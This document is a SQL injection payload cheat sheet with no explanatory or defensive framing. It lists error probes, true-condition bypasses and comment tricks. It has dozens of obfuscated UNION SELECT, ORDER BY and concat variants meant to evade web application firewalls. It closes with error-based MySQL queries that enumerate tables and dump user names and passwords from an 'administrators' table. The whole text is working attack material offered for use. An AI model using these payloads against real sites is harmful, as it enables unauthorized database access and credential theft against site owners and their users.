SQLI

[~] Chek Eror [~]

01. '
02. "
03. or 1=1
04. and 1=1
05. and false
06. and true

• [Single qiotes]
01. ' or '1'='1'--+-
02. ')-- -
03. ')--+-
04. '))-- -
05. '))--+-
06. ';%00
07. ');%00
08. '));%00
09. '%23
10. '%60
11. '%90
12. ' and 1=1
13. ' and '1'='1
14. ' and (1)=(1
15. (1') -- -
16. ' and '1'='1
17. ' and false
18. ' and true
• [Double quotes]
01. " or "1"="1
02. " and "1"="1
03. " and false
04. " and true
05. "-- -
06. "--+-
07. "%23
08. ")-- -
09. ")--+-
10. "))--+-
11. ";%00
12. ") ;%00
13. "));%00
14. "%60
15. "%90
16. " and 1=1
18. " and '1'='1
19. " and (1)=(1
20. php?id=(1") -- -

[~]Baypass True Condition[~]

or '1
|| '1
null' || 'a'=_binary'a
1' || 'a'=x'61
1' && '0'=x'30
1' %26%26 %270%27%3dx'30
2' && 0.e1=_binary"0
1 or 1.e1=0b1010
' || 1 like 1
'-'
"-"
' || 2 not like 1
110 or x'30'=48
'1'!=20
1 or 20!='1'
2 and 2>0
3 || 0<1
12 || 0b1010<0b1011
0b11 || 0b1010x'30'
1 or 0b1
2121/**/||21
111' or _binary'1
1 or 2121
1' or 12 rlike '1


[~] KOMENTAR [~]

01. --		  :	MySQL Linux Style
02. --+		:	MySQL Windows Style
03. #		  :	Hash (URL encode while use)
04. --+-	   :	SQL Comment
05. ;%00	 :	Null Byte
07. `  	  	:	Backtick
08. -- -
09. /*
10. /**/
11. %23
12. //


[~] order by [~]

01. group by -- +
02. and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
03. Procedure Analyse()--+
04. and (select * from news)=(select 0)--+
05. /**/ORDER/**/BY/**/
06. /*!order*/+/*!by*/
07. /*!ORDER BY*/
08. /*!50000ORDER BY*/
09. /*!50000ORDER*//**//*!50000BY*/
10. /*!12345ORDER*/+/*!BY*/


[~] UNION select [~]

01. (uNioN)+(sElECt)….
02. (uNioN+SeleCT)+…
03. (UnI)(oN)+(SeL)(ecT)+….
04. union (select 1,2,3,4…)
05. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
06. %55nion(%53elect 1,2,3)-- -
07. +union+distinct+select+
08. +union+distinctROW+select+
09. /**//*!12345UNION SELECT*//**/
10. /**//*!50000UNION SELECT*//**/
11. /**/UNION/**//*!50000SELECT*//**/
12. /*!50000UniON SeLeCt*/
13. union /*!50000%53elect*/
14. +#uNiOn+#sEleCt
15. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
16. /*!%55NiOn*/ /*!%53eLEct*/
17. /*!u%6eion*/ /*!se%6cect*/
18. +un/**/ion+se/**/lect
19. uni%0bon+se%0blect
20. %2f**%2funion%2f**%2fselect
21. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
22. REVERSE(noinu)+REVERSE(tceles)
24. /*--*/union/*--*/select/*--*/
25. union (/*!/**/ SeleCT */ 1,2,3)
26. /*!union*/+/*!select*/
27. union+/*!select*/
28. /**/union/**/select/**/
29. /**/uNIon/**/sEleCt/**/
30. +%2F**/+Union/*!select*/
31. /**//*!union*//**//*!select*//**/
32. /*!uNIOn*/ /*!SelECt*/
33. +union+distinct+select+
34. +union+distinctROW+select+
35. uNiOn aLl sElEcT
36. UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+

+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]

CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]

/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

[~] Eror based [~]

• Chek versi
= and (select * from (select name_const(version(),1),name_const(version(),1))a)
• Chek user
= and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
• Chek database
= and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
• Chek Table
= and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
• Chek Column
= and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
= and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
= and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

• Dump data
= and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
= and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


[~] Using Xpath [~]
01. and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))--